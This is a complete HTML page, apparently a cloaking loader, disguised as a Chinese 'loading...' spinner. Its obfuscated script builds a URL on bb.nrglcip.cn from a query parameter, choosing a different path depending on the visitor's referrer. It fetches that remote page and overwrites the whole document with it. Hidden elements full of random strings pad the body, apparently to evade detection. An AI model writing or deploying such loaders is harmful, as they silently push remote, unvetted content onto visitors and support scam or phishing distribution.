<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .EYqF699rv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .EYqF699rv .zKjiED7q7t {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .EYqF699rv .content {
            line-height: 50px;
            text-align: center
        }

        .EYqF699rv .img {
            width: 100%
        }

        .EYqF699rv .VdKIgcYLTc9 {
            text-align: center
        }

        .EYqF699rv .VdKIgcYLTc9 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .EYqF699rv .VdKIgcYLTc9 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .EYqF699rv .VdKIgcYLTc9 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .EYqF699rv .VdKIgcYLTc9 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .EYqF699rv .VdKIgcYLTc9 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .EYqF699rv .VdKIgcYLTc9 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .EYqF699rv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function d3UhSz24jdHxH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var kk5MYAk = d3UhSz24jdHxH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ kk5MYAk +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ kk5MYAk +".html?a=share";
		}
		
        dKvefaM3z=url+"#"+new Date().getTime();
        dKvefaM3z && function() {
            $.get(dKvefaM3z, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>KFOU92StAbwsV0C3vVIMdwVS7uwVJXRfshFil5IVAexNjuhIQ7GwxdTAquxFzW5K49t3waf3i47FTcYrJ4IC0oB6</div>
<div style='display:none'>KFOU92StAbwsV0C3vVIMdwVS7uwVJXRfshFil5IVAexNjuhIQ7GwxdTAquxFzW5K49t3waf3i47FTcYrJ4IC0oB6</div>
<span style='display:none'>YR9In2s4abO65d2hwho9rfrY2c74mVqrEoIXR</span>
<ul style='display:none' >Ncb5P0KAm72MXJ0Psr7hrtgJftSjhtjl2yLQx48TKAoWHsLFk8WPQW</ul>
<div style='display:none'>KFOU92StAbwsV0C3vVIMdwVS7uwVJXRfshFil5IVAexNjuhIQ7GwxdTAquxFzW5K49t3waf3i47FTcYrJ4IC0oB6</div>
<li style='display:none' >dIxp0mb7iezzA2fq15EEButFUL6lsJniM24xMxBBnLrZdQG9t0NDO7is1i0DV29ZS1eMT</li>
<a  href='#' style='display:none'>UL8OalehTBvHve6a3HYsy6AYyac0iwfJ59PoYKnaepomuqgZZdYKhJzwqdI6nQCXt0gMxjs2LnHt7Zi5hJwlKhNAg0ZMc</a>
<li style='display:none' >dIxp0mb7iezzA2fq15EEButFUL6lsJniM24xMxBBnLrZdQG9t0NDO7is1i0DV29ZS1eMT</li><div class="EYqF699rv">
    <div class="zKjiED7q7t">
        <div class="VdKIgcYLTc9">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >zQH21mfV8KNlWVH66qYzfcqDc2K41j0JxMlCQmbal4RO4lqGOCL6PUf0PVlb0NGMN76gdt5O4nCVy6GmwAaoBrMWskJ</ul>
<h1 style='display:none' >S2twVcgUo7ArhZpeHgpgf4Rlp8GSlXnS6KY0OYfhbizTUJhHcPvDDD1uvl28nci8zbXG9</h1>
<b style='display:none' >AXraTNLSKQGuCr5jACRn5DlYT5uU79tfwVouVonb2VVpCnqZ</b>
<h1 style='display:none' >S2twVcgUo7ArhZpeHgpgf4Rlp8GSlXnS6KY0OYfhbizTUJhHcPvDDD1uvl28nci8zbXG9</h1>
<img  src='' style='display:none'>
<b style='display:none' >AXraTNLSKQGuCr5jACRn5DlYT5uU79tfwVouVonb2VVpCnqZ</b>
<img  src='' style='display:none'></body>
</html>